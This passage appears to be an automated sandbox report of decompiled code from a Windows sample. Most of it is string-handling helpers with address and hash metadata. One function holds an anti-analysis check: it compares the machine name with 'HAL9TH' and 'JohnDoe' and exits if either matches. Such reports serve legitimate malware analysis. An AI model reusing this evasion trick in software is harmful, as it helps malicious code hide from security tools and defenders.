                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                  • Part of subcall function 00403CAC: std::_Xinvalid_argument.LIBCPMT ref: 00403CBB
                                                                                • _memmove.LIBCMT ref: 00403C88
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403C28
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position
                                                                                • API String ID: 3404309857-1799206989
                                                                                • Opcode ID: adb276e73de40375f5a6c3a08118ec9c82dec2784e741eef39d7458d410bfbf7
                                                                                • Instruction ID: 11111a018ed27134238f4363f4a5fcdb6e407d3f4073d5ef00e807834f5dc106
                                                                                • Opcode Fuzzy Hash: adb276e73de40375f5a6c3a08118ec9c82dec2784e741eef39d7458d410bfbf7
                                                                                • Instruction Fuzzy Hash: 1E1104333086109BEB249E09C844A5ABBADEB81716B10093FF812F72C1C778DB41879E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E48F(intOrPtr* __eax, void* __ecx, signed int __edx, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t17;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t31;
                                                                                				intOrPtr _t32;
                                                                                				signed int _t37;
                                                                                				intOrPtr* _t40;
                                                                                				signed int _t42;
                                                                                
                                                                                				_t37 = __edx;
                                                                                				_t31 = __ecx;
                                                                                				_t28 = "\\";
                                                                                				_t40 = __eax;
                                                                                				if(E00403E2A(__eax, "\\") == 0) {
                                                                                					_t17 =  *(_t40 + 0x10);
                                                                                					_t32 = _a4;
                                                                                					if((_t37 | 0xffffffff) - _t17 <= _t32) {
                                                                                						_t17 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t32 != 0) {
                                                                                						_t42 = _t17 + _t32;
                                                                                						if(E00403AFB(_t28, _t40, _t42) != 0) {
                                                                                							if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                								_t21 = _t40;
                                                                                							} else {
                                                                                								_t21 =  *_t40;
                                                                                							}
                                                                                							E00421230(_t21 +  *(_t40 + 0x10) * 2, _t28, _a4 + _a4);
                                                                                							 *(_t40 + 0x10) = _t42;
                                                                                							if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                								_t24 = _t40;
                                                                                							} else {
                                                                                								_t24 =  *_t40;
                                                                                							}
                                                                                							 *((short*)(_t24 + _t42 * 2)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t40;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                					_t25 = _t40;
                                                                                				} else {
                                                                                					_t25 =  *_t40;
                                                                                				}
                                                                                				return E0040E3F4(_a4, _t31, _t40, _t40, _t28 - _t25 >> 1);
                                                                                			}















                                                                                0x0040e48f
                                                                                0x0040e48f
                                                                                0x0040e491
                                                                                0x0040e497
                                                                                0x0040e4a0
                                                                                0x0040e4bf
                                                                                0x0040e4c2
                                                                                0x0040e4cd
                                                                                0x0040e4d4
                                                                                0x0040e4d4
                                                                                0x0040e4db
                                                                                0x0040e4de
                                                                                0x0040e4ea
                                                                                0x0040e4f0
                                                                                0x0040e4f6
                                                                                0x0040e4f2
                                                                                0x0040e4f2
                                                                                0x0040e4f2
                                                                                0x0040e507
                                                                                0x0040e513
                                                                                0x0040e516
                                                                                0x0040e51c
                                                                                0x0040e518
                                                                                0x0040e518
                                                                                0x0040e518
                                                                                0x0040e520
                                                                                0x0040e520
                                                                                0x0040e524
                                                                                0x00000000
                                                                                0x0040e525
                                                                                0x0040e4a6
                                                                                0x0040e4ac
                                                                                0x0040e4a8
                                                                                0x0040e4a8
                                                                                0x0040e4a8
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: 4841f8916a000331bc09baffaf21fde5c2963440be9b2ab0ac0d3499f219faed
                                                                                • Instruction ID: d63f833a7f7cdb249f7bf1187001ff2bf229015282837ddaacb18bade9a6afb9
                                                                                • Opcode Fuzzy Hash: 4841f8916a000331bc09baffaf21fde5c2963440be9b2ab0ac0d3499f219faed
                                                                                • Instruction Fuzzy Hash: 96118270700201ABCA14DF6EDD8482AB3A9BFD5369304493FF411E7291DB38E975D6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040383D(intOrPtr* __eax, intOrPtr* __edi, signed int _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t30;
                                                                                				intOrPtr* _t31;
                                                                                				intOrPtr* _t36;
                                                                                				intOrPtr _t38;
                                                                                				intOrPtr _t39;
                                                                                
                                                                                				_t36 = __edi;
                                                                                				_t29 = __eax;
                                                                                				_t17 = _a4;
                                                                                				_t38 =  *((intOrPtr*)(__eax + 0x10));
                                                                                				if(_t38 < _t17) {
                                                                                					_t17 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t39 = _t38 - _t17;
                                                                                				if(_a8 < _t39) {
                                                                                					_t39 = _a8;
                                                                                				}
                                                                                				if(_t36 != _t29) {
                                                                                					if(E00403AFB(_t29, _t36, _t39) != 0) {
                                                                                						if( *((intOrPtr*)(_t29 + 0x14)) < 8) {
                                                                                							_t21 = _t29;
                                                                                						} else {
                                                                                							_t21 =  *_t29;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                                							_t31 = _t36;
                                                                                						} else {
                                                                                							_t31 =  *_t36;
                                                                                						}
                                                                                						_t30 = _t39 + _t39;
                                                                                						E00421230(_t31, _t21 + _a4 * 2, _t30);
                                                                                						 *((intOrPtr*)(_t36 + 0x10)) = _t39;
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                                							_t24 = _t36;
                                                                                						} else {
                                                                                							_t24 =  *_t36;
                                                                                						}
                                                                                						 *((short*)(_t30 + _t24)) = 0;
                                                                                					}
                                                                                				} else {
                                                                                					E00403A8A(_t17 | 0xffffffff, _t39 + _t17, _t36);
                                                                                					E00403A8A(_a4, 0, _t36);
                                                                                				}
                                                                                				return _t36;
                                                                                			}















                                                                                0x0040383d
                                                                                0x00403841
                                                                                0x00403843
                                                                                0x00403847
                                                                                0x0040384c
                                                                                0x00403853
                                                                                0x00403853
                                                                                0x00403858
                                                                                0x0040385d
                                                                                0x0040385f
                                                                                0x0040385f
                                                                                0x00403864
                                                                                0x00403888
                                                                                0x0040388e
                                                                                0x00403894
                                                                                0x00403890
                                                                                0x00403890
                                                                                0x00403890
                                                                                0x0040389a
                                                                                0x004038a0
                                                                                0x0040389c
                                                                                0x0040389c
                                                                                0x0040389c
                                                                                0x004038a5
                                                                                0x004038ae
                                                                                0x004038ba
                                                                                0x004038bd
                                                                                0x004038c3
                                                                                0x004038bf
                                                                                0x004038bf
                                                                                0x004038bf
                                                                                0x004038c7
                                                                                0x004038c7
                                                                                0x00403866
                                                                                0x0040386e
                                                                                0x00403878
                                                                                0x00403878
                                                                                0x004038d0

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403853
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                  • Part of subcall function 00403AFB: std::_Xinvalid_argument.LIBCPMT ref: 00403B08
                                                                                • _memmove.LIBCMT ref: 004038AE
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040384E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position
                                                                                • API String ID: 3404309857-1799206989
                                                                                • Opcode ID: ab4252aab716a49de741ed798c7a0fdc2ff0f38ea8bb8a44f00ab793ee04ca37
                                                                                • Instruction ID: e4caaf74bf71e2e5c52c448cadf7bb6a42956e4f7b28af81d8734420a35d8e1d
                                                                                • Opcode Fuzzy Hash: ab4252aab716a49de741ed798c7a0fdc2ff0f38ea8bb8a44f00ab793ee04ca37
                                                                                • Instruction Fuzzy Hash: 9B11B632B14510DBCB10FF19C4804697BEDBF5531630489BBF802AB2C1D738EA59CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D1DF(signed int __eax, void* __ebx, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t16;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr* _t19;
                                                                                				void* _t22;
                                                                                				signed int _t23;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __ebp;
                                                                                				_t22 = __ebx;
                                                                                				_t29 = _a4;
                                                                                				_t32 = __eax;
                                                                                				_t23 = __eax;
                                                                                				if(E00403D0E(__eax, _a4) == 0) {
                                                                                					_t13 =  *((intOrPtr*)(_t32 + 0x10));
                                                                                					if((_t23 | 0xffffffff) - _t13 <= __ebx) {
                                                                                						_t13 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t22 != 0) {
                                                                                						_t30 = _t13 + _t22;
                                                                                						if(E00403CAC(_t22, _t32, _t30, _t33, _t30, 0) != 0) {
                                                                                							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                								_t16 = _t32;
                                                                                							} else {
                                                                                								_t16 =  *_t32;
                                                                                							}
                                                                                							E00421230( *((intOrPtr*)(_t32 + 0x10)) + _t16, _a4, _t22);
                                                                                							 *((intOrPtr*)(_t32 + 0x10)) = _t30;
                                                                                							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                								_t18 = _t32;
                                                                                							} else {
                                                                                								_t18 =  *_t32;
                                                                                							}
                                                                                							 *((char*)(_t18 + _t30)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t32;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                					_t19 = _t32;
                                                                                				} else {
                                                                                					_t19 =  *_t32;
                                                                                				}
                                                                                				return E0040D270(_t22, _t23, _t32, _t32, _t29 - _t19);
                                                                                			}














                                                                                0x0040d1df
                                                                                0x0040d1df
                                                                                0x0040d1e1
                                                                                0x0040d1e5
                                                                                0x0040d1e8
                                                                                0x0040d1f1
                                                                                0x0040d20c
                                                                                0x0040d216
                                                                                0x0040d21d
                                                                                0x0040d21d
                                                                                0x0040d224
                                                                                0x0040d226
                                                                                0x0040d235
                                                                                0x0040d23b
                                                                                0x0040d241
                                                                                0x0040d23d
                                                                                0x0040d23d
                                                                                0x0040d23d
                                                                                0x0040d24e
                                                                                0x0040d25a
                                                                                0x0040d25d
                                                                                0x0040d263
                                                                                0x0040d25f
                                                                                0x0040d25f
                                                                                0x0040d25f
                                                                                0x0040d265
                                                                                0x0040d265
                                                                                0x0040d235
                                                                                0x00000000
                                                                                0x0040d269
                                                                                0x0040d1f7
                                                                                0x0040d1fd
                                                                                0x0040d1f9
                                                                                0x0040d1f9
                                                                                0x0040d1f9
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: 4029cfd549f4354e7c9b7dd7b702f89fb4be9c386876f7f7706eea7d7ae77d39
                                                                                • Instruction ID: 2ed2454a1e5dc419a3f4eed0d756660298f0f3eb08462334a109b967aca17dbe
                                                                                • Opcode Fuzzy Hash: 4029cfd549f4354e7c9b7dd7b702f89fb4be9c386876f7f7706eea7d7ae77d39
                                                                                • Instruction Fuzzy Hash: 0D117731B047109BD6349EAD9D40A26B7E5EF41B04B10097FB452A72C1C778DD4D869D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0040C372(void* __edx, intOrPtr __edi, void* __eflags) {
                                                                                				signed int _v8;
                                                                                				char _v36;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				signed int _t9;
                                                                                				intOrPtr* _t11;
                                                                                				signed int _t12;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t15;
                                                                                				signed int _t16;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t30 = __edi;
                                                                                				_t9 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t9 ^ _t32;
                                                                                				_t31 =  &_v36;
                                                                                				_t11 = E00415A2E(__edx, __edi,  &_v36);
                                                                                				if( *((intOrPtr*)(_t11 + 0x14)) >= 0x10) {
                                                                                					_t11 =  *_t11;
                                                                                				}
                                                                                				_t29 = _t11;
                                                                                				_t12 = E00417230("HAL9TH", _t11);
                                                                                				asm("sbb bl, bl");
                                                                                				_t13 = E00402C34( &_v36, 1, 0);
                                                                                				_t19 =  ~_t12 + 1;
                                                                                				_t35 =  ~_t12 + 1;
                                                                                				if( ~_t12 + 1 != 0) {
                                                                                					_t31 =  &_v36;
                                                                                					_t15 = E00415BB2(_t19, _t30,  &_v36, _t35);
                                                                                					if( *((intOrPtr*)(_t15 + 0x14)) >= 0x10) {
                                                                                						_t15 =  *_t15;
                                                                                					}
                                                                                					_t29 = _t15;
                                                                                					_t16 = E00417230("JohnDoe", _t15);
                                                                                					asm("sbb bl, bl");
                                                                                					_t13 = E00402C34( &_v36, 1, 0);
                                                                                					_t19 =  ~_t16 + 1;
                                                                                					if( ~_t16 + 1 != 0) {
                                                                                						ExitProcess(0);
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t13, _t19, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                			}














                                                                                0x0040c372
                                                                                0x0040c378
                                                                                0x0040c37f
                                                                                0x0040c384
                                                                                0x0040c387
                                                                                0x0040c390
                                                                                0x0040c392
                                                                                0x0040c392
                                                                                0x0040c399
                                                                                0x0040c39b
                                                                                0x0040c3ab
                                                                                0x0040c3ad
                                                                                0x0040c3b2
                                                                                0x0040c3b2
                                                                                0x0040c3b4
                                                                                0x0040c3b6
                                                                                0x0040c3b9
                                                                                0x0040c3c2
                                                                                0x0040c3c4
                                                                                0x0040c3c4
                                                                                0x0040c3cb
                                                                                0x0040c3cd
                                                                                0x0040c3dd
                                                                                0x0040c3df
                                                                                0x0040c3e4
                                                                                0x0040c3e6
                                                                                0x0040c3ea
                                                                                0x0040c3ea
                                                                                0x0040c3e6
                                                                                0x0040c3fd

                                                                                APIs
                                                                                  • Part of subcall function 00415A2E: GetComputerNameA.KERNEL32 ref: 00415A62
                                                                                • ExitProcess.KERNEL32 ref: 0040C3EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ComputerExitNameProcess
                                                                                • String ID: HAL9TH$JohnDoe
                                                                                • API String ID: 359086898-3469431008
                                                                                • Opcode ID: e6099f0a6a5f796692b82720c7cc07f1e827716d959402145798add63c7a2ffd
                                                                                • Instruction ID: 1fabda566b0308a9f7d451591b5347009765d607b777055cc12e3ad6f40b20a7
                                                                                • Opcode Fuzzy Hash: e6099f0a6a5f796692b82720c7cc07f1e827716d959402145798add63c7a2ffd
                                                                                • Instruction Fuzzy Hash: CD01B5307512089FEB18EBB58D867ED7371EB49304F40046AEA027B2E2DA7C9D46C79D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403EAE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t15;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr* _t30;
                                                                                
                                                                                				_t30 = __ecx;
                                                                                				_t9 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                				_t20 = _a4;
                                                                                				if(_t9 < _t20) {
                                                                                					_t9 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t17 = _a8;
                                                                                				_t10 = _t9 - _t20;
                                                                                				if(_t10 < _t17) {
                                                                                					_t17 = _t10;
                                                                                				}
                                                                                				if(_t17 != 0) {
                                                                                					_t22 =  *((intOrPtr*)(_t30 + 0x14));
                                                                                					if(_t22 < 0x10) {
                                                                                						_t26 = _t30;
                                                                                					} else {
                                                                                						_t26 =  *_t30;
                                                                                					}
                                                                                					if(_t22 < 0x10) {
                                                                                						_t23 = _t30;
                                                                                					} else {
                                                                                						_t23 =  *_t30;
                                                                                					}
                                                                                					E0041E250(_t23 + _t20, _t26 + _t20 + _t17, _t10 - _t17);
                                                                                					_t15 =  *((intOrPtr*)(_t30 + 0x10)) - _t17;
                                                                                					 *((intOrPtr*)(_t30 + 0x10)) = _t15;
                                                                                					if( *((intOrPtr*)(_t30 + 0x14)) < 0x10) {
                                                                                						_t21 = _t30;
                                                                                					} else {
                                                                                						_t21 =  *_t30;
                                                                                					}
                                                                                					 *((char*)(_t21 + _t15)) = 0;
                                                                                				}
                                                                                				return _t30;
                                                                                			}













                                                                                0x00403eaf
                                                                                0x00403eb1
                                                                                0x00403eb4
                                                                                0x00403eba
                                                                                0x00403ec1
                                                                                0x00403ec1
                                                                                0x00403ec7
                                                                                0x00403ecb
                                                                                0x00403ecf
                                                                                0x00403ed1
                                                                                0x00403ed1
                                                                                0x00403ed5
                                                                                0x00403ed7
                                                                                0x00403ede
                                                                                0x00403ee4
                                                                                0x00403ee0
                                                                                0x00403ee0
                                                                                0x00403ee0
                                                                                0x00403ee9
                                                                                0x00403eef
                                                                                0x00403eeb
                                                                                0x00403eeb
                                                                                0x00403eeb
                                                                                0x00403efc
                                                                                0x00403f07
                                                                                0x00403f0d
                                                                                0x00403f11
                                                                                0x00403f17
                                                                                0x00403f13
                                                                                0x00403f13
                                                                                0x00403f13
                                                                                0x00403f19
                                                                                0x00403f19
                                                                                0x00403f21

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403EC1
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • _memmove.LIBCMT ref: 00403EFC
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403EBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1785806476-1799206989
                                                                                • Opcode ID: af80e2120ba5968590871f54cc49d26c9df6d40808f1997a7dced45c2216f617
                                                                                • Instruction ID: c418a75ba16cb48df8d192100aed17eada65e50fdb217f800e17a2e5bf082662
                                                                                • Opcode Fuzzy Hash: af80e2120ba5968590871f54cc49d26c9df6d40808f1997a7dced45c2216f617
                                                                                • Instruction Fuzzy Hash: AF01B5317042518BC324DE6CD98081BBBBAEBC57027204E3EE082D7681D779ED86C7D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403A8A(void* __eax, signed int __ecx, intOrPtr* __esi) {
                                                                                				intOrPtr _t14;
                                                                                				void* _t15;
                                                                                				signed int _t24;
                                                                                				intOrPtr* _t26;
                                                                                				signed int _t28;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t33;
                                                                                				intOrPtr* _t34;
                                                                                
                                                                                				_t34 = __esi;
                                                                                				_t28 = __ecx;
                                                                                				_t33 = __eax;
                                                                                				_t14 =  *((intOrPtr*)(__esi + 0x10));
                                                                                				if(_t14 < __ecx) {
                                                                                					_t14 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t15 = _t14 - _t28;
                                                                                				if(_t15 < _t33) {
                                                                                					_t33 = _t15;
                                                                                				}
                                                                                				if(_t33 != 0) {
                                                                                					_t30 =  *((intOrPtr*)(_t34 + 0x14));
                                                                                					if(_t30 < 8) {
                                                                                						_t26 = _t34;
                                                                                					} else {
                                                                                						_t26 =  *_t34;
                                                                                					}
                                                                                					if(_t30 < 8) {
                                                                                						_t31 = _t34;
                                                                                					} else {
                                                                                						_t31 =  *_t34;
                                                                                					}
                                                                                					E0041E250(_t31 + _t28 * 2, _t26 + (_t28 + _t33) * 2, _t15 - _t33 + _t15 - _t33);
                                                                                					_t24 =  *(_t34 + 0x10) - _t33;
                                                                                					 *(_t34 + 0x10) = _t24;
                                                                                					if( *((intOrPtr*)(_t34 + 0x14)) < 8) {
                                                                                						_t29 = _t34;
                                                                                					} else {
                                                                                						_t29 =  *_t34;
                                                                                					}
                                                                                					 *((short*)(_t29 + _t24 * 2)) = 0;
                                                                                				}
                                                                                				return _t34;
                                                                                			}













                                                                                0x00403a8a
                                                                                0x00403a8a
                                                                                0x00403a8b
                                                                                0x00403a8d
                                                                                0x00403a92
                                                                                0x00403a99
                                                                                0x00403a99
                                                                                0x00403a9e
                                                                                0x00403aa2
                                                                                0x00403aa4
                                                                                0x00403aa4
                                                                                0x00403aa8
                                                                                0x00403aaa
                                                                                0x00403ab1
                                                                                0x00403ab7
                                                                                0x00403ab3
                                                                                0x00403ab3
                                                                                0x00403ab3
                                                                                0x00403abc
                                                                                0x00403ac2
                                                                                0x00403abe
                                                                                0x00403abe
                                                                                0x00403abe
                                                                                0x00403ad4
                                                                                0x00403adf
                                                                                0x00403ae5
                                                                                0x00403ae9
                                                                                0x00403aef
                                                                                0x00403aeb
                                                                                0x00403aeb
                                                                                0x00403aeb
                                                                                0x00403af3
                                                                                0x00403af3
                                                                                0x00403afa

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403A99
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • _memmove.LIBCMT ref: 00403AD4
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403A94
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1785806476-1799206989
                                                                                • Opcode ID: 5f8fd1b6db95633989606435382b13d3034b5e80018b3eaa665933ffd38d205f
                                                                                • Instruction ID: 720684423c2553102bf9fbebe1beda0a40ebbc2d731b1dc030533118bb8b0cfd
                                                                                • Opcode Fuzzy Hash: 5f8fd1b6db95633989606435382b13d3034b5e80018b3eaa665933ffd38d205f
                                                                                • Instruction Fuzzy Hash: C90171313106018BC720CE6DDA9485AB7AEAFC4706324093FD0C2D7A85E739DA468B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0040F37F(char* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v24;
                                                                                				char* _t17;
                                                                                				signed char _t19;
                                                                                				char* _t26;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t17 = 0;
                                                                                				if(_a4 == 0) {
                                                                                					L3:
                                                                                					_t19 =  *(_t26 + 0x10) &  *(_t26 + 0xc);
                                                                                					if((_t19 & 0x00000004) == 0) {
                                                                                						if((_t19 & 0x00000002) == 0) {
                                                                                							_t28 = E0041D681();
                                                                                							_a4 = "ios_base::eofbit set";
                                                                                						} else {
                                                                                							_t28 = E0041D681();
                                                                                							_a4 = "ios_base::failbit set";
                                                                                						}
                                                                                					} else {
                                                                                						_t28 = E0041D681();
                                                                                						_a4 = "ios_base::badbit set";
                                                                                					}
                                                                                					_t8 =  &_v24; // 0x442450
                                                                                					_t26 = _t8;
                                                                                					E0041E15E(_t26,  &_a4);
                                                                                					_v12 = 1;
                                                                                					_v8 = _t28;
                                                                                					_v24 = 0x442450;
                                                                                					_push(0x444274);
                                                                                					_t12 =  &_v24; // 0x442450
                                                                                					_t17 = _t12;
                                                                                					goto L2;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L2:
                                                                                					_push(_t17);
                                                                                					E00421126();
                                                                                					goto L3;
                                                                                				}
                                                                                			}










                                                                                0x0040f385
                                                                                0x0040f38c
                                                                                0x0040f395
                                                                                0x0040f398
                                                                                0x0040f3a0
                                                                                0x0040f3d5
                                                                                0x0040f3ec
                                                                                0x0040f3ee
                                                                                0x0040f3d7
                                                                                0x0040f3dc
                                                                                0x0040f3de
                                                                                0x0040f3de
                                                                                0x0040f3a2
                                                                                0x0040f3a7
